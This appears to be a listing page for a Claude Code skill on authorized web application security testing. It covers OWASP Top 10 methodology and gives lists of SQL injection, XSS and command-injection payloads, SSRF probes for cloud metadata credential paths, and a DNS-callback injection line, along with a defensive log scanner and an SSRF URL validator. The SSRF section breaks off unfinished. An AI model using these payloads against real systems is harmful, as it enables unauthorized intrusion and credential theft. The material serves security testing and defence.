ClaudeWave
Skill · 72 repo stars · updated 11d ago

Web Application Security Testing

OWASP Top 10 testing, injection vulnerability detection, API security assessment, authentication testing, and web vulnerability reporting for authorized assessments

Install in Claude Code:

```bash
git clone --depth 1 https://github.com/Masriyan/Claude-Code-CyberSecurity-Skill /tmp/web-application-security-testing && cp -r /tmp/web-application-security-testing/skills/09-web-security ~/.claude/skills/web-application-security-testing
```

Then open a new Claude Code session; the skill loads automatically.

SKILL.md

# Web Application Security Testing

## Purpose

Enable Claude to assist with comprehensive web application security assessments covering OWASP Top 10, injection testing, API security, authentication analysis, and client-side security. Claude analyzes application behavior, generates test payloads, reviews source code, and produces structured vulnerability reports.

> **Authorization Required**: All testing must be performed on authorized targets only. Confirm scope and written authorization before testing.

---

## Activation Triggers

This skill activates when the user asks about:
- OWASP Top 10 testing or assessment methodology
- SQL injection, XSS, SSRF, SSTI, command injection testing
- API security testing (REST, GraphQL, SOAP)
- Authentication bypass, session management flaws
- Web application firewall (WAF) bypasses for authorized testing
- CORS, CSP, or security header analysis
- OAuth/OIDC security review
- JWT analysis or manipulation
- Burp Suite or OWASP ZAP usage guidance
- Web vulnerability report writing

---

## Prerequisites

```bash
pip install requests beautifulsoup4 urllib3 lxml
```

**Recommended tools:**
- `Burp Suite Community/Pro` — Web proxy and scanner
- `OWASP ZAP` — Open-source web scanner
- `sqlmap` — Automated SQL injection (authorized use only)
- `Nikto` — Web server scanner
- `ffuf / feroxbuster` — Web fuzzer
- `jwt_tool` — JWT analysis and manipulation

---

## Core Capabilities

### 1. OWASP Top 10 Assessment

**When the user asks to assess for OWASP Top 10 vulnerabilities:**

| # | Vulnerability | Claude's Assessment Approach |
|---|--------------|------------------------------|
| A01 | Broken Access Control | Test IDOR, path traversal, forced browsing, privilege escalation |
| A02 | Cryptographic Failures | Audit TLS, check sensitive data exposure, weak algorithms |
| A03 | Injection | Test all inputs for SQLi, NoSQLi, OS command, LDAP, SSTI |
| A04 | Insecure Design | Review architecture for missing security controls |
| A05 | Security Misconfiguration | Check defaults, error disclosure, directory listing, debug mode |
| A06 | Vulnerable Components | Audit third-party libraries and framework versions |
| A07 | Auth & ID Failures | Test session management, brute force, MFA, credential storage |
| A08 | Software & Data Integrity | Check update mechanisms, deserialization, CI/CD security |
| A09 | Logging & Monitoring Failures | Verify logging coverage and alerting |
| A10 | SSRF | Test URL parameters, webhooks, import functionality |

### 2. Injection Testing

**When the user asks to test for injection vulnerabilities:**

**Input Discovery — Map all injection points:**
```
GET/POST parameters
URL path segments (/users/INJECT/profile)
HTTP headers (X-Forwarded-For, User-Agent, Referer, Cookie)
JSON body fields {"name": "INJECT"}
XML body fields <name>INJECT</name>
GraphQL variables {query: "{ user(name: \"INJECT\") }"}
File upload names and metadata
```

**SQL Injection Testing Methodology:**
```
Step 1: Detection — Test for error-based confirmation
  ' → SQL error = likely vulnerable
  ' OR '1'='1 → true condition
  ' OR '1'='2 → false condition
  ' AND SLEEP(5)-- - → time delay = blind SQLi

Step 2: Fingerprint the database
  ' AND 1=CONVERT(int,@@version)-- - → MSSQL version
  ' AND 1=1 UNION SELECT @@version-- - → MySQL
  ' AND 1=(SELECT 1 FROM dual)-- - → Oracle

Step 3: Extraction (authorized PoC only)
  ' UNION SELECT null,username,password,null FROM users-- -
```

**SQLi Payload Library:**
```sql
-- Basic detection
'
''
`
')
'))
' OR '1'='1'--
' OR 1=1--
" OR "1"="1
' OR 'x'='x

-- MySQL time-based blind
' AND SLEEP(5)-- -
' OR SLEEP(5)=0-- -

-- MSSQL time-based blind
'; WAITFOR DELAY '0:0:5'-- -

-- PostgreSQL time-based blind
'; SELECT pg_sleep(5)-- -

-- Error-based (MySQL)
' AND extractvalue(1,concat(0x7e,(SELECT version())))-- -
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT version()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -

-- UNION enumeration
' ORDER BY 1-- -  (increment until error to find column count)
' UNION SELECT null-- -
' UNION SELECT null,null-- -
' UNION SELECT null,null,null-- -
```

**XSS Testing Methodology:**
```
Step 1: Find reflection points
  Input: test123  →  Search in source for "test123"
  What HTML context is it in?
    • HTML content: <p>test123</p>
    • Attribute: <input value="test123">
    • JavaScript: var x = "test123";
    • URL: href="test123"

Step 2: Test basic payload for context
  HTML content:    <script>alert(1)</script>
  Attribute:       " onmouseover="alert(1)
  JavaScript:      ";alert(1);//
  URL:             javascript:alert(1)

Step 3: Bypass filters
  Case variation:  <ScRiPt>alert(1)</ScRiPt>
  No parentheses:  <img src=x onerror=alert`1`>
  No script tag:   <img src=x onerror=alert(document.domain)>
  SVG:             <svg onload=alert(1)>
  Template:        {{constructor.constructor('alert(1)')()}}
```

**Command Injection Testing:**
```bash
# Linux injection separators
; id
| id
& id
&& id
`id`
$(id)
%0aid

# Windows injection separators
& whoami
| whoami
; dir
%26 dir

# Blind detection via time delay
; sleep 5
| timeout 5
& ping -n 5 127.0.0.1

# Blind detection via DNS callback (use Burp Collaborator or interactsh)
; nslookup YOUR-CALLBACK-DOMAIN.com
```
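The SQLi, XSS and command-injection indicators above, seen from the defender's side: an added example (not part of the skill or its repository) that scans constructed access-log lines for those payload patterns and labels each hit. The regex set and the sample lines are my own construction, not a complete ruleset.

```python
import re
from urllib.parse import unquote_plus

# Indicator regexes drawn from the SQLi, XSS and command-injection payloads above; they run
# against the percent-decoded, lower-cased request target of each access-log line.
PATTERNS = {
    "sqli": [
        r"['\"]\s*(or|and)\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+",  # ' OR '1'='1 tautologies
        r"union\s+(all\s+)?select",          # UNION column enumeration / extraction
        r"\bsleep\s*\(\d+\)",                # MySQL time-based blind
        r"waitfor\s+delay",                  # MSSQL time-based blind
        r"pg_sleep\s*\(",                    # PostgreSQL time-based blind
    ],
    "xss": [
        r"<\s*(script|svg|img)\b",           # tag injection in HTML context
        r"\bon(error|load|mouseover)\s*=",   # event-handler attribute injection
        r"javascript\s*:",                   # URL context
    ],
    "cmdi": [
        r"[;|&`\n]\s*(id|whoami|dir|sleep\s+\d+|nslookup)\b",  # separator + command
        r"\$\(\s*(id|whoami)\s*\)",          # $(id) substitution
    ],
}
COMPILED = {cat: [re.compile(p) for p in pats] for cat, pats in PATTERNS.items()}
REQUEST_LINE = re.compile(r'"(?:GET|POST|PUT|DELETE)\s+(\S+)\s+HTTP/')

def classify_request(target):
    """Return the set of injection categories whose indicators appear in a request target."""
    decoded = unquote_plus(unquote_plus(target)).lower()  # second pass catches %2527-style double encoding
    return {cat for cat, regs in COMPILED.items() if any(r.search(decoded) for r in regs)}

def scan_access_log(lines):
    """Return [(line_number, sorted categories)] for log lines that carry injection indicators."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue  # malformed line: skip rather than crash
        hits = classify_request(match.group(1))
        if hits:
            findings.append((number, sorted(hits)))
    return findings

# Constructed sample lines in Apache combined format; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /products?id=42 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /products?id=42%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 9120',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 301',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /ping?host=127.0.0.1%3B%20sleep%205 HTTP/1.1" 500 0',
]
```

Feed `scan_access_log` real log lines to get a per-line list of categories; the patterns are detection hints for triage, not a WAF.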

**SSRF Testing Methodology:**
```
Step 1: Find URL input points
  - Import functionality (import from URL)
  - Webhooks (send notification to URL)
  - Document converters (URL to PDF)
  - Image loading from URL
  - API calls with URL parameters

Step 2: Test basic SSRF to internal resources
  http://127.0.0.1/
  http://localhost/
  http://192.168.1.1/           # Default gateway
  http://169.254.169.254/       # AWS metadata
  http://metadata.google.internal/  # GCP metadata
  http://[::1]/                 # IPv6 localhost

Step 3: Test cloud metadata services (AWS example)
  http://169.254.169.254/latest/meta-data/
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

Step 4:
```
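A server-side allowlist check for the URL inputs listed in Step 1, written as an added example (not code from the skill or its repository): it refuses the loopback, private, link-local and metadata destinations from Steps 2 and 3, and resolves hostnames so a name that points at one of them is refused too. The `resolver` hook and the example.com names are assumptions for offline use.

```python
import socket
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit

# Destinations the SSRF methodology above probes first: loopback, RFC 1918 space (default
# gateway), link-local including the 169.254.169.254 metadata endpoint, and IPv6 loopback.
BLOCKED_NETWORKS = [ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10",
)]
BLOCKED_HOSTS = {"localhost", "metadata.google.internal"}
ALLOWED_SCHEMES = {"http", "https"}

def is_blocked_address(addr):
    """True if a literal address falls in a blocked range (IPv4-mapped IPv6 is unwrapped first)."""
    ip = ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETWORKS)

def default_resolver(host):
    """Resolve a hostname to every address it maps to (network call; swapped out in tests)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def check_outbound_url(url, resolver=default_resolver):
    """Return (allowed, reason) for a user-supplied URL before the server fetches it."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = (parts.hostname or "").rstrip(".")  # lower-cased, IPv6 brackets removed
    if not host:
        return False, "missing host"
    if host in BLOCKED_HOSTS or host.endswith(".internal"):
        return False, f"internal hostname {host!r}"
    try:
        ip_address(host)
        addresses = [host]                      # literal address: check it directly
    except ValueError:                          # not a literal: resolve and check every answer
        try:
            addresses = resolver(host)
        except OSError:
            return False, f"cannot resolve {host!r}"
    for addr in addresses:
        if is_blocked_address(addr):
            return False, f"{host!r} reaches blocked address {addr}"
    # Connect to the checked address rather than resolving the name again, so a changed
    # DNS answer cannot redirect the fetch after validation.
    return True, "ok"
```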